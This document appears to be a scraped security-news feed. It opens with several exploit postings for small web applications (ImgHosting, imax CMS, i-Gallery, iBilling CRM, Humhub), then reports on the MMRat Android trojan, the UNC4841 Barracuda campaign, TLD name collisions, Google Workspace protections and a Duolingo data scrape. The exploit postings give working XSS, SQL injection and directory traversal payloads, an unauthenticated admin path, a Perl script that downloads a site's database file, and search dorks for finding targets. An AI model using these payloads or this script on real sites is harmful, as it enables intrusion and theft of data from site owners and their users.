ImgHosting version 1.2 suffers from a cross site scripting vulnerability.

**ImgHosting 1.2 Cross Site Scripting**

Posted Aug 29, 2023

Authored by indoushka

ImgHosting version 1.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 3e0de4ff80dc516a1abe50185e5807a1e503d782b2cd24457e01031368191dc0

Download | Favorite | View

**ImgHosting 1.2 Cross Site Scripting**

    ====================================================================================================================================| # Title     : ImgHosting v1.2 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codecanyon.net/user/FoxSash/?ref=FoxSash                                                                   |  | # Dork      : "ImgHosting  Programming by FoxSash"                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : ?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/pikhostinom/?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,046)
*   Arbitrary (16,219)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,283)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,460)
*   Encryption (2,370)
*   Exploit (52,001)
*   File Inclusion (4,225)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,788)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,694)
*   Local (14,460)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,339)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,816)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,891)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,394)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,796)
*   Web (9,671)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,973)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,822)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,543)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,777)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,844)
*   UNIX (9,301)
*   UnixWare (186)
*   Windows (6,579)
*   Other

ImgHosting 1.2 Cross Site Scripting

imax CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : imax CMS v1.0 Sql Injection Vulnerability                                                                          || # Author    : indoushka                                                                                                          | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://i-maxinfotech.com                                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] http://127.0.0.1/cafesaffronnetau/view_page.php?id={{x.id}} <=====| inject here[+]  Panel :http://127.0.0.1/cafesaffronnetau/wp-admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

imax CMS 1.0 SQL Injection

i-Gallery version 3.4 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : i-Gallery v3.4 Database Disclosure Exploit                                                                         |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : http://wmscripti.com/asp-scriptler/igallery-image-resim-galerisi-scripti.html                                      |    
====================================================================================================================================

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (igallery.mdb ) file  
    The (igallery.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# i-Gallery v3.4 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : ToastForums.com

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print ('i-Gallery v3.4 Database Disclosure Exploit');  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="database/igallery.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/igallery.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/igallery.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
=======================================================================================================================================

i-Gallery 3.4 Database Disclosure

iBilling CRM version 4.5.0 suffers from add administrator and insecure direct object reference vulnerabilities.

    ====================================================================================================================================| # Title     : iBilling CRM v4.5.0 Add Admin vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/ibilling-crm-accounting-and-billing-software/11021678                                  || # Dork      : "Login - iBilling"                                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] suffers from an insecure direct object reference that allows users to access the administrative interface.[+] choose a target and add "sysfrm/install/profile.php"[+] http://127.0.0.1/wintechsolutionsin/ibilling/sysfrm/install/profile.php[+] http://127.0.0.1/demotryibcom/dashboard/sysfrm/install/profile.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

iBilling CRM 4.5.0 Add Administrator / Insecure Direct Object Reference

Humhub version 1.3.13 suffers from a directory traversal vulnerability.

    ====================================================================================================================================| # Title     : Humhub v1.3.13 Directory traversal Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 67.0(32-bit)                                               | | # Vendor    : https://www.humhub.org/en/download/package/humhub-1.3.13.zip                                                       |  | # Dork      : "Propulsé par HumHub"                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /static/assets/d1081741/fonts/../Gemfile[+] https://127.0.0.1/humhubcom/static/assets/d1081741/fonts/../GemfileGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Humhub 1.3.13 Directory Traversal

By Deeba Ahmed
So far, the potent Android trojan MMRat has remained undetected on VirusTotal.
This is a post from HackRead.com Read the original post: New MMRat Android Trojan Uses Fake App Stores for Bank Fraud

*   **MMRat is a new Android banking trojan targeting Southeast Asian users.**

*   **It is distributed through phishing websites disguised as official app stores.**

*   **It uses a customized Protobuf-based C2 protocol to improve its performance.**

*   **It captures screenshots, controls devices, collects extensive device, personal data.**

*   **Users can protect themselves from MMRat by downloading apps from trusted sources and avoiding suspicious websites.**

Cybersecurity researchers at Trend Micro Mobile Application Reputation Service (MARS) have discovered a stealthy new Android trojan targeting Southeast Asian mobile phone users since late June 2023.

This Android banking trojan, dubbed MMRat due to its distinctive package called com.mm.user, features a long list of capabilities as it can capture screenshots, remotely control victims’ devices, monitor user input, and perform many other tasks apart from bank fraud while staying undetected.

MARS researchers wrote in a blog post published on August 29, 2023, that the malware remained undetected on VirusTotal.

**How is MMRat Distributed?**

Most MMRat samples were downloaded from phishing websites disguised as official app stores in different languages to expand their reach. It is worth noting that researchers couldn’t determine how victims were lured into visiting these fake app stores.

This “potent” malware has been declared a “considerable threat” to mobile phone users. It uses a specially designed, fully customized Protobuf-based C2 protocol, a rare feature in Android banking trojans. This feature improves the malware’s performance while transferring large data volumes.

**Attack Sequence**

MMRat’s primary focus is on conducting bank fraud. The attack relies on the victim downloading and installing the malware on their device and granting it the required permissions. Once done, the malware quickly establishes communication with its remote server, sending copious amounts of data, including personal and mobile data, keylogging data, device status, etc.

Moreover, the malware operator can remotely turn on the device when not in use, unlock the screen, and carry out bank fraud. They may also capture screens for server-size visualization. After performing its malicious tasks, MMRat can self-uninstall and remove every trace of the manipulation.

Attack Sequence (Trend Micro)

**MMRat Capabilities**

As mentioned above, MMRat is a highly capable malware that can capture user input/screen content and allow remote control of the device. Relying on the Android Accessibility service and MediaProjection API for its functioning, the malware can easily detect when the device is on or off and reboot it by registering a receiver on the system.

Furthermore, the trojan avoids suspicion by disguising itself as an official government or dating app and enters the victim’s device through a phishing website. It also launches a 1×1-sized pixel activity to stay persistent.

**What Data Does it Collect?**

According to Trend Micro’s blog post, MMRat can collect extensive device and personal data such as screen and battery data such as whether the screen is locked and current activities, installed apps, contact lists, and network data, e.g., signal strength and network type.

The Android trojan also schedules a time task to collect data at regular intervals. This timer executes every second, and the counter resets every 60 seconds. It looks for victims’ contact lists and installed app info to get maximum personal details. 

After obtaining Accessibility permission, it can obtain extended permission and modify device settings by bypassing user intervention. It is also interested in lock screen patterns, which it collects when the victim unlocks the device and sends it to the C2 server so that the malware operator can unlock the device when desired.

What’s worse, it captures real-time screen content and streams it to a remote server via the MediaProjection API. MMRat also uses the “user terminal state” approach for capturing screen data, in which it doesn’t record the screen as a video but dumps the child nodes in Windows every second.

**How to Stay Protected?**

Users must download apps from trusted platforms like Google Play Store or Apple App Store and avoid suspicious websites posing as app stores. It is equally important to keep updating device software to mitigate security threats like MMRat. Lastly, be very careful when granting Accessibility permissions to an app.

**RELATED ARTICLES**

1.  WhatsApp Pink is malware spreading through group chats
2.  Android apps on APKPure store caught spreading malware
3.  Fake reviews & third-party apps cause 50% of Android threats

New MMRat Android Trojan Uses Fake App Stores for Bank Fraud

A suspected Chinese-nexus hacking group exploited a recently disclosed zero-day flaw in Barracuda Networks Email Security Gateway (ESG) appliances to breach government, military, defense and aerospace, high-tech industry, and telecom sectors as part of a global espionage campaign.
Mandiant, which is tracking the activity under the name UNC4841, described the threat actor as "highly responsive to

A suspected Chinese-nexus hacking group exploited a recently disclosed zero-day flaw in Barracuda Networks Email Security Gateway (ESG) appliances to breach government, military, defense and aerospace, high-tech industry, and telecom sectors as part of a global espionage campaign.

Mandiant, which is tracking the activity under the name **UNC4841**, described the threat actor as "highly responsive to defensive efforts" and capable of actively tweaking their modus operandi to maintain persistent access to targets.

"UNC4841 deployed new and novel malware designed to maintain presence at a small subset of high priority targets that it compromised either before the patch was released, or shortly following Barracuda's remediation guidance," the Google-owned threat intelligence firm said in a new technical report published today.

Almost a third of the identified affected organizations are government agencies. Interestingly enough, some of the earliest compromises appear to have taken place on a small number of devices geolocated to mainland China.

The attacks entail the exploitation of CVE-2023-2868 to deploy malware and conduct post-exploitation activities. In select cases, the intrusions have led to the deployment of additional malware, such as SUBMARINE (aka DEPTHCHARGE), to maintain persistence in response to remediation endeavors.

Further analysis of the campaign has revealed a "distinct fall off in activity from approximately January 20 to January 22, 2023," coinciding with the beginning of the Chinese New Year, followed by two surges, one after Barracuda's public notification on May 23, 2023, and a second one in early June 2023.

The latter is said to have involved the attacker "attempting to maintain access to compromised environments via the deployment of the new malware families SKIPJACK, DEPTHCHARGE, and FOXTROT / FOXGLOVE."

While SKIPJACK is a passive implant that registers a listener for specific incoming email headers before decoding and running their content, DEPTHCHARGE is pre-loaded into the Barracuda SMTP (BSMTP) daemon using the LD\_PRELOAD environment variable, and retrieves encrypted commands for execution.

The earliest use of DEPTHCHARGE dates back to May 30, 2023, merely days after Barracuda publicly disclosed the flaw. Mandiant said it observed the malware being rapidly deployed to a subset of targets, indicating a high level of preparation and an attempt to persist within high-value environments.

"It also suggests that despite this operation's global coverage, it was not opportunistic, and that UNC4841 had adequate planning and funding to anticipate and prepare for contingencies that could potentially disrupt their access to target networks," the company explained.

Roughly 2.64 percent of the total compromised appliances are estimated to have been infected with DEPTHCHARGE. This victimology spans U.S. and foreign government entities, as well as high-tech and information technology providers.

The third malware strain, also selectively delivered to targets, is FOXTROT, a C++ implant that's launched using a C-based program dubbed FOXGLOVE. Communicating via TCP, it comes with features to capture keystrokes, run shell commands, transfer files, and set up a reverse shell.

What's more, FOXTROT shares overlaps with an open-source rootkit called Reptile, which has been extensively used by multiple Chinese hacking crews in recent months. This also comprises UNC3886, a threat actor linked to the zero-day exploitation of a now-patched medium-severity security flaw in the Fortinet FortiOS operating system.

"FOXTROT and FOXGLOVE are also notable in that they are the only malware families observed being used by UNC4841 that were not specifically designed for Barracuda ESGs," Mandiant pointed out. "Based on functionality, FOXTROT was likely also intended to be deployed to other Linux-based devices within a network to enable lateral movement and credential theft."

Another aspect that makes FOXGLOVE and FOXTROT stand out is the fact that they have been the most selectively deployed among all malware families used by UNC4841, exclusively using it to target government or government-related organizations.

The adversarial collective has also been detected performing internal reconnaissance and subsequent lateral movement actions within a limited number of victim environments. More than one case entailed utilizing Microsoft Outlook Web Access (OWA) to attempt to log in to mailboxes for users within the organizations.

As an alternative form of remote access, the advanced persistent threat (APT) actor created accounts containing four randomly generated characters within the etc/passwd file on roughly five percent of the previously impacted appliances.

UNC4841's Chinese connections are further bolstered by the infrastructure commonalities between the group and another uncategorized cluster codenamed UNC2286, which, in turn, shares overlaps with other Chinese espionage campaigns tracked as FamousSparrow and GhostEmperor.

The latest disclosure comes against the backdrop of the U.S. Federal Bureau of Investigation (FBI) urging impacted customers to replace their ESG appliances with immediate effect, citing continued risk.

"UNC4841 is a well-resourced actor that has utilized a wide range of malware and purpose-built tooling to enable their global espionage operations," the company said, calling out the threat actor's ability to selectively deploy more payloads to specific victim environments.

"Shared infrastructure and techniques for anonymization are common amongst Chinese cyber espionage actors, as is shared tooling and likely malware development resources. It is likely that we will continue to observe Chinese cyber espionage operations targeting edge infrastructure with zero-day vulnerabilities and the deployment of malware customized to specific appliance ecosystems."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Hacking Group Exploits Barracuda Zero-Day to Target Government, Military, and Telecom

Google introduced the new “.zip” Top Level Domain (TLD) on May 3, 2023, igniting a firestorm of controversy as security organizations warned against the confusion that was certain to occur. 
When clicking on a name that ends in “.zip” are people intending to open an archive

Tuesday, August 29, 2023 08:08

Google introduced the new “.zip” Top Level Domain (TLD) on May 3, 2023, igniting a firestorm of controversy as security organizations warned against the confusion that was certain to occur.

When clicking on a name that ends in “.zip” are people intending to open an archive file or an internet URL? The confusion that arises between the ZIP file extension and the ZIP TLD is called a “name collision” — and is not a new phenomenon.

According to ICANN, a name collision occurs “when a user unknowingly accesses a name that has been delegated in the public DNS when the user's intent is to access a resource identified by the same name in a private network.” Name collisions have been an issue dating back years. Back in 2013 when ICANN introduced several new TLDs they also introduced a Name Collision Occurrence Management Framework to deal with the problem.

Users and programs alike depend on DNS to navigate the internet. In the worst case, confusion over whether some name is a public DNS name or another private resource can cause sensitive data to fall into the hands of unintended recipients.

****Controlled interruption****

To alert network administrators to potential name collisions in DNS, the Name Collision Occurrence Management Framework prescribes a “controlled interruption.” In this approach, a TLD publishes special DNS records — instructions that provide information about a domain — at the root level. Some examples include mail exchange (MX), service location (SRV), text (TXT), and address (A) records. Networks whose internal names collide with the TLD receive DNS replies containing the name “your-dns-needs-immediate-attention.<TLD>” and IP address 127.0.53.53. Presumably, seeing this in the logs would allow administrators to address the problem.

****The .kids TLD is not alright****

One TLD that appears to publish controlled interruption DNS records is .kids. For example, querying DNS for the MX or SRV record for the .kids TLD yields the ‘your-dns-needs-immediate.attention.kids’ name in response. For some reason, however, contrary to the framework from ICANN, the .kids TLD publishes no A record at the root level. The .kids TLD formerly did have the 127.0.53.53 A record, per the controlled interruption policy from ICANN, but for whatever reason .kids stopped offering the A record IP address back in January of 2023. This suggests that after the controlled interruption policy was implemented it was either changed or never fully removed.

Hostname lookups on various DNS record types in the .kids TLD.

One critical piece of information that was left out of the ICANN name collision framework was that the TLD must ensure the name, ‘your-dns-needs-immediate-attention.<TLD>’ is not available for public registration. Unfortunately, no such restriction was in place at the .kids TLD, and Cisco Talos successfully registered the domain name:

    **your-dns-needs-immediate-attention.kids**

Talos set up an internet server to log all activity related to this name, and immediately we received a barrage of HTTP requests from systems running Microsoft’s “System Center Configuration Manager.”

SCCM requests are issued from various endpoints using a name in .kids.

System Center Configuration Manager is a tool used by administrators to remotely manage computer systems across a network. According to Microsoft:

“Configuration Manager helps you deliver more effective IT services by enabling:

*   Secure and scalable deployment of applications, software updates, and operating systems.
*   Real-time actions on managed devices.
*   Cloud-powered analytics and management for on-premises and internet-based devices.
*   Compliance settings management.
*   Comprehensive management of servers, desktops, and laptops.”

Because Talos registered the domain name "your-dns-needs-immediate-attention.kids", we were able to masquerade as a trusted system. Networks using .kids names could be tricked into trusting our system to relay internal mail, dictate configuration management settings, and more.

Systems attempting to relay email through Talos to various email addresses @kids.

Cisco Talos reached out to the administrators of the .kids TLD informing them of the problem. The TXT, MX and SRV DNS records at the .kids TLD DNS server were subsequently removed.

****Zombified DNS names****

Name collisions aren’t the only situations that can cause a TLD to act strangely. Some do not respond properly when presented with names that have expired or never existed. In these TLDs, unregistered and expired domain names still resolve to IP addresses. Some of these TLDs even publish MX records and collect emails for the names in question.

Typically, when a domain name is not actively registered, a DNS query for that name will generate the response,‘NXDOMAIN’ which tells the user that a particular name does not exist. NXDOMAIN DNS responses are useful for a number of reasons. Email list managers, for example, might use NXDOMAIN responses from DNS to help prune invalid recipients and recipients that cannot receive mail from their mailing lists.

****.ws ccTLD — Western Samoa****

The .ws country-level TLD (ccTLD) was created for Western Samoa and marketed as a global TLD that could stand for “website.” When a domain name at the .ws TLD expires (or if it is a new name that was never registered), DNS servers will never return an \`NXDOMAIN\` response. Rather, the .ws TLD continues to hand out an IP address and MX server:

The mail.hope-mail.com server accepts mail for any unregistered domain name at the .ws ccTLD.

****.vg ccTLD — The Virgin Islands****

The .vg country-level TLD belongs to the British Virgin Islands and, like the .ws ccTLD, when a name at .vg expires (or if it is a new name that was never registered), DNS servers will respond with an IP address. However, unlike the .ws TLD, .vg doesn’t provide an MX server for the domain name.

On the surface, this would seem like a good thing that no MX record is provided. However, according to RFC 5321, when a domain name associated with an email address has no MX records, “the address is treated as if it was associated with an implicit MX RR, with a preference of 0, pointing to that host.” In other words, SMTP servers will assume that mail should be delivered to the IP address associated with the A record for a domain.

In fact, the IP address handed out by the .vg TLD does listen on port 25 and accepts connections for non-existent domain names. Fortunately, attempts to deliver mail to a non-existent domain will fail with a 550 error message:

Unsuccessfully attempting to send mail to the implicit MX offered by .vg.

****.ph ccTLD — The Philippines****

The .ph ccTLD belongs to the Philippines, and instead of the expected NXDOMAIN response, DNS requests for expired or non-existent names at .ph will return the IP address 45\[.\]79\[.\]222\[.\]138.

Unlike the .vg ccTLD, there is no mail server listening on the IP address provided by the .ph TLD. Attempts to deliver mail to an expired .ph domain name will fail, but the domain name itself will still resolve, which can still be problematic in some situations.

****Second-level “TLDs”****

Besides the official list of TLDs sanctioned by ICANN, there are also quite a few second-level registrations that people have turned into their own “TLDs,” that also do not respond properly to zombified DNS names. For example, sites such as “com.de” are technically second-level registrations at the .de TLD, but they offer registrations at the third level, billing themselves as “Germany’s newest domain extension.”

Queries for expired/non-existent domains at com.de return both an IP address and a mail server.

Fortunately, the mail server mail.cash9.com will not accept mail for non-existent domain names.

Unsuccessfully attempting to send mail to the MX offered by .com.de.

A similar situation exists at the “TLD” us.org, which markets itself as “a new domain extension for organizations, projects, websites and people with a higher standard of social responsibility and ethical behavior.”

When a DNS query is issued to us.org for a name that has expired or does not exist, an IP address is returned along with several MX servers:

MX records for the .us.org domain.

The DNS records at us.org are set up in an interesting way. Although they return MX records for our non-existent domain name, if you look carefully at the MX records returned by the DNS we can see that the lowest preference MX is simply a dot \[.\]. This is a NULL MX setting and it means that there are no mail servers for the domain. Well-behaved mail servers will recognize the NULL MX preference and cease attempting to deliver mail to that address. Poorly behaved mail servers, on the other hand, may latch onto a lower preference MX and connect to googlemail.com to attempt email delivery.

What's in a name?  Strange behaviors at top-level domains creates uncertainty in DNS

Categories: Business
Tags: google

Tags:  gmail

Tags:  workplace

Tags:  protection

Tags:  sensitive

Tags:  trigger

Tags:  business

We take a look at how Google is strengthening protections across its Workplace products, and Gmail in particular.



(Read more...)




The post Google strengthens its Workplace suite protection appeared first on Malwarebytes Labs.

Posted: August 28, 2023 by

Google has announced the strengthening of safeguard measures for its Workspace customers. You may well be using Workspace without realising it. If you’re using a Google product such as Gmail, Calendar, Drive, or Google Docs Editors Suite (among other apps), then congratulations: you are fully inside the Workspace ecosystem.

Late last year, changes were made to try and catch out an attacker rifling through Google accounts and attempting to access certain critical settings or functionality.

When an account (any account, not just one offered by Google) is taken over, there’s going to be a specific flow the compromiser makes use of. 

For example, if I hijack your email the first thing I’ll try and do is lock you out by changing your password. After that, I might pay a visit to the backup email address and try to stop you from regaining access that way. All of your accounts will have hot button settings which attackers will make a beeline for.

Google’s response to assist Workspace administrators was presenting challenges to users when performing sensitive actions in unusual ways not seen before. Logging in far away from your usual location? Following an odd or significantly different pattern when trying to log in? These actions and more could trigger the challenge response.

One login challenge might be a two-step login prompt. Others might be specified by the administrator of the service being used. It’s a pretty flexible system.

The new additions related to features in Gmail. Specifically:

> *   Filters: creating a new filter, editing an existing filter, or importing filters. 
> *   Forwarding: Adding a new forwarding address from the Forwarding and POP/IMAP settings. 
> *   IMAP access: Enabling the IMAP access status from the settings. (Workspace admins control whether this setting is visible to end users or not) 

With these in place, if an attacker hijacked your mail and then tried to sneakily add a forwarding address then Google would flag it and issue a “Verify it’s you” challenge. Depending on how the system has been set up by the admin, a relevant identity challenge will then take place. If the challenge is failed, the user will be sent a critical security alert notification on a trusted device to let them know someone is up to no good.

Cleverly, Google has designed the system so that even an incomplete challenge will send out an alert. Sorry attackers, you can’t just ignore it or back out!

At this point, you may be wondering if there's a list of activities you can expect to trigger a challenge as well as a list of potential challenges. Fear not, the relevant Google Support page has it covered.

Here’s some of the more common challenge triggers:

> *   View activity saved in your Google Account
> *   Change your password
> *   View saved passwords
> *   Turn on 2-Step Verification
> *   Download your data
> *   Change channel ownership on YouTube Creator Studio
> *   Change Google Ads account budget
> *   Buy any other product or service from Google
> *   Example: Buy a Google Pixel or Nest device from Google Store

Here’s how you can verify your identity. It’s important to note that in order to verify yourself, the device you use to do this must have been registered for a period of seven days minimum:

> *   A device associated with the recovery phone number for your account
> *   A device that's signed in to your Google Account
> *   For accounts with 2-Step Verification turned on
> *   A security key that’s been added to your Google Account
> *   A verification code from Google Authenticator

If you fail the challenge you can still use and access your account, but updating sensitive information or completing sensitive actions are not allowed for a seven day period.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

**RELATED ARTICLES**

Google strengthens its Workplace suite protection

Categories: News
Tags: DuoLingo

Tags:  data breach

Tags:  email adress

Tags:  username

Tags:  real name

Using an openly available API, cybercrimnals were able to scrape the data of 2.6 million DuoLingo users.



(Read more...)




The post 2.6 million DuoLingo users have scraped data released appeared first on Malwarebytes Labs.

An unknown party has released the scraped data of 2.6 million DuoLingo users on a hacking forum. While they offered the data set for sale in January for $1,500, it's now been released on a new version of the Breached hacking forum for 8 site credits, worth only $2.13.

DuoLingo is an educational platform most famous for its language learning programs. According to a May 2023 press release, DuoLingo has 72.6 million monthly active users.

The scraped data among others contain email addresses, usernames, languages, and which language the users are learning.

_screenshot courtesy of FalconFeedsio_

The data were scraped from public profile information by using an exposed application programming interface (API). On March 2, a researcher called Ivano Somaini tweeted how one could take advantage of Duolingo’s API to check if an email address is associated with a Duolingo account.

The API allows anyone to run a query by submitting a username or an email address to confirm if it is associated with a valid DuoLingo account. Bleeping Computer has confirmed that this API is still openly available to anyone on the web, even after its abuse was reported to DuoLingo in January.

Such a query by email address will result in JSON formatted data, revealing:

*   Streak – A user's streak is a measure of how consistently they use Duolingo. A streak starts at zero and increases by one for each day the user completes a lesson.
*   Profile picture – For this field, Duolingo’s API yields a URL with this structure //simg-ssl.duolingo.com/avatar/\*\*\*\*\*\*\*/\*\*\*\*\*\*\*. If you get //simg-ssl.duolingo.com/avatar/default\_2 it means there’s no profile picture associated with the email address you’ve queried.
*   Learning languages, XP points and crowns – Duolingo’s API shows which courses the account has enrolled in. XP points and crowns give an idea of the progression on those courses. When you learn on Duolingo, you earn experience points, or XP for short.
*   hasFacebookId – Shows if the profile is associated with a Facebook account (true or false)
*   hasGoogleId - Shows if the profile is associated with a Google account (true or false)
*   id – Probably Duolingo’s user ID.
*   username – Username associated with the Duolingo’s account
*   hasPhoneNumber – Shows if the profile is associated with a phone number (true or false)
*   creationDate – This is a Unix timestamp (epoch time) that appears to show when the account was created.
*   name – The real name associated with the account.
*   Location – User location (unknown if it’s vetted by Duolingo)
*   emailVerified – Shows if the email address associated with the account was checked by Duolingo (true or false).

HaveIbeenPwnd’s (HIBP) Troy Hunt explained how it is possible that practically every one of the email addresses in the DuoLingo data could already be found in the HIBP database. The email addresses the scraper used came from the big melting pot of data breach-land being used to compromise even more of our personal information. By trying millions and millions of addresses, the scraper found 2.6 million matches on DuoLingo.

Troy Hunt added:

> “I'm a Duolingo user but because I have a unique email address on every service, I'm not in there”

Even though most of the scraped data is publicly available, it gives cybercriminals yet another chance to correlate more information with a specific email address or name. Affected users should be wary of phishing emails making use of this information. For example, since you are interested in a certain language you might be more likely to fall for an email inviting you to visit a country where that language is spoken.

**Data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   Check the vendor's advice. Every breach is different, so check with the vendor to find out what's happened, and follow any specific advice they offer.
*   Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don't use for anything else. Better yet, let a password manager choose one for you.
*   Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
*   Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.

Malwarebytes EDR and MDR remove all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Tag

#google